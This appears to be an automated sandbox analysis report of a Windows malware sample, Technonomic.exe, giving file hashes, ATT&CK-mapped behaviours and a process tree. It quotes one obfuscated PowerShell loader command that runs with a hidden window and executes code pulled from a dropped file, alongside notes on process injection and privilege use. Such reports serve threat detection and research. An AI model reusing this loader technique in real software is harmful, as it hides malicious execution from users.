Analysis
max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags
arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
submitted
24-12-2024 10:26
Static task
static1
Behavioral task
behavioral1
Sample
Technonomic.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Technonomic.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
General
Target
Technonomic.exe
Size
759KB
MD5
c174a412be6f74c3323ae8d6d4737086
SHA1
c703daa5df8c281206a8d85b582b8a1b729748f5
SHA256
bb71b94948e6929047bde8df94c187fbb6f2cc0119a0c386f84b9ea144aabd67
SHA512
9f2b95174fd1283964ea61e6dbe07c450ed0a01aad6b3852c43ef6811a92878f0f123dfbc1f88b2cf05479a94af098591bd579f3c3581521819f3b12d20dfa42
SSDEEP
12288:iDGZKmormA1bzZN13qv776npUyBsIpxBFmgI2uSb+zKikGOfj8UvbjSM+LLWwvpf:gmor/1/Z877oS8sEx/PI//zKNzpbNQLt
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid   Process
1816  powershell.exe

Loads dropped DLL 1 IoCs
pid   Process
2872  Technonomic.exe

Drops file in Windows directory 1 IoCs
description                   ioc                               Process
File opened for modification  C:\Windows\resources\unthick.ini  Technonomic.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc                                                          Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Technonomic.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs
pid   Process
1816  powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs
description              pid   Process
Token: SeDebugPrivilege  1816  powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs
description                       pid   Process          procid_target
PID 2872 wrote to memory of 1816  2872  Technonomic.exe  28
PID 2872 wrote to memory of 1816  2872  Technonomic.exe  28
PID 2872 wrote to memory of 1816  2872  Technonomic.exe  28
PID 2872 wrote to memory of 1816  2872  Technonomic.exe  28
Processes
C:\Users\Admin\AppData\Local\Temp\Technonomic.exe
"C:\Users\Admin\AppData\Local\Temp\Technonomic.exe"
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 2872
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\Admin\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) "
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 1816
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize
33B
MD5
e23f52386361095bdb7040b09e2216ae
SHA1
91f31dd82ab80140db621b6dce0b9b5d6b568723
SHA256
36467321184a76e0fea592d2896856a37ec18fc8480de66f05d719d93b39d070
SHA512
19d18de54b3466f0d283271786b3b308c3be07f21174c46563c4c16292716c52f2c1b85f416ed77143ea6847bfc4c4c37f22296948eac47499276b181f129b9c

Filesize
6KB
MD5
1b0e41f60564cccccd71347d01a7c397
SHA1
b1bddd97765e9c249ba239e9c95ab32368098e02
SHA256
13ebc725f3f236e1914fe5288ad6413798ad99bef38bfe9c8c898181238e8a10
SHA512
b6d7925cdff358992b2682cf1485227204ce3868c981c47778dd6da32057a595caa933d8242c8d7090b0c54110d45fa8f935a1b4eec1e318d89cc0e44b115785